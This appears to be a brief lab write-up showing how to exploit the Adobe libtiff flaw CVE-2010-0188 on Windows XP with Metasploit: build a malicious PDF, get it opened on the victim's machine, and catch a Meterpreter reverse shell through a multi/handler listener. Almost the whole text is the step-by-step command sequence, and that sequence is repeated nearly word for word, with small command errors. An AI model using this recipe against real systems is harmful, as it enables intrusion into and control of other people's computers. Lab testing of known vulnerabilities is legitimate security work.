I tested the "adobe_libtiff(CVE-2010-0188)" vulnerability on Windows XP with Metasploit.
Follow the steps below. This is the case of a reverse shell for connecting to victim's system.
Generally, the victim system's firewall is not related even if it is in use.
# systemctl start postgresql
# systemctl enable postgresql
# msfdb init
# msfconsole
msf > apt update
msf > apt upgrade
msf > use exploit/windows/fileformat/adobe libtiff
msf exploit(windows/fileformat/adobe libtiff) > set LHOST [Attacker's IP address]
msf exploit(windows/fileformat/adobe libtiff) > set LPORT [Attacker's Port number]
msf exploit(windows/fileformat/adobe libtiff) > exploit
(Move the extracted PDF file to the victim's system.)
msf exploit(windows/fileformat/adobe libtiff) > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST [Attacker's IP address]
msf exploit(multi/handler) > set LPORT [Attacker's Port number]
msf exploit(multi/handler) > exploit
(Run the PDF file on victim's system.)
meterpreter > (The state that the shell was acquired)
# systemctl enable postgresql
# msfdb init
# msfconsole
msf > apt update
msf > apt upgrade
msf > use exploit/windows/fileformat/adobe libtiff
msf exploit(windows/fileformat/adobe libtiff) > set LHOST [Attacker's IP address]
msf exploit(windows/fileformat/adobe libtiff) > set LPORT [Attacker's Port number]
msf exploit(windows/fileformat/adobe libtiff) > exploit
(Move the extracted PDF file to the victim's system.)
msf exploit(windows/fileformat/adobe libtiff) > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST [Attacker's IP address]
msf exploit(multi/handler) > set LPORT [Attacker's Port number]
msf exploit(multi/handler) > exploit
(Run the PDF file on victim's system.)
meterpreter > (The state that the shell was acquired)